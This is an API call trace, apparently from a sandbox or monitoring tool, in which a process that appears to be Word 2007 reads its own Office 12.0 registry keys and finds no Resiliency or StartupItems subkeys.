[0085.268] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.268] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.268] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x368) returned 0x0
[0085.269] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.269] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.269] RegCloseKey (hKey=0x368) returned 0x0
[0085.269] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.269] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x368) returned 0x0
[0085.269] RegCloseKey (hKey=0x36c) returned 0x0
[0085.269] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.269] RegOpenKeyExW (in: hKey=0x368, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.269] RegCloseKey (hKey=0x368) returned 0x0
[0085.269] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.269] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x368) returned 0x0
[0085.269] RegCloseKey (hKey=0x36c) returned 0x0
[0085.269] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.270] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x36c) returned 0x0
[0085.270] RegCloseKey (hKey=0x36c) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.270] RegCloseKey (hKey=0x36c) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.270] RegCloseKey (hKey=0x36c) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.270] RegCloseKey (hKey=0x36c) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.270] RegCloseKey (hKey=0x36c) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x36c) returned 0x0
[0085.270] RegCloseKey (hKey=0x36c) returned 0x0
[0085.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.271] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.272] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x36c) returned 0x0
[0085.272] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.272] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.272] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.272] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x36c) returned 0x0
[0085.272] RegCloseKey (hKey=0x36c) returned 0x0
[0085.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x36c) returned 0x0
[0085.273] RegCloseKey (hKey=0x36c) returned 0x0
[0085.273] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x36c) returned 0x0
[0085.273] RegCloseKey (hKey=0x36c) returned 0x0
[0085.273] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x0) returned 0x2
[0085.273] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.273] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x36c) returned 0x0
[0085.273] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.273] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x370) returned 0x0
[0085.273] RegCloseKey (hKey=0x36c) returned 0x0
[0085.273] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.273] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x36c) returned 0x0
[0085.274] RegCloseKey (hKey=0x370) returned 0x0
[0085.274] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.274] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x370) returned 0x0
[0085.274] RegCloseKey (hKey=0x36c) returned 0x0
[0085.274] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.274] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x36c) returned 0x0
[0085.274] RegCloseKey (hKey=0x370) returned 0x0
[0085.274] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.274] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0085.274] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.274] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x370) returned 0x0
[0085.274] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.274] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x374) returned 0x0
[0085.274] RegCloseKey (hKey=0x370) returned 0x0
[0085.274] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.275] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x370) returned 0x0
[0085.275] RegCloseKey (hKey=0x374) returned 0x0
[0085.275] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.275] RegOpenKeyExW (in: hKey=0x370, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x374) returned 0x0
[0085.275] RegCloseKey (hKey=0x370) returned 0x0
[0085.275] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.275] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x370) returned 0x0
[0085.275] RegCloseKey (hKey=0x374) returned 0x0
[0085.275] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.275] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0085.275] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.276] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x0) returned 0x2
[0085.276] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.276] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x374) returned 0x0
[0085.276] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.276] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x394) returned 0x0
[0085.276] RegCloseKey (hKey=0x374) returned 0x0
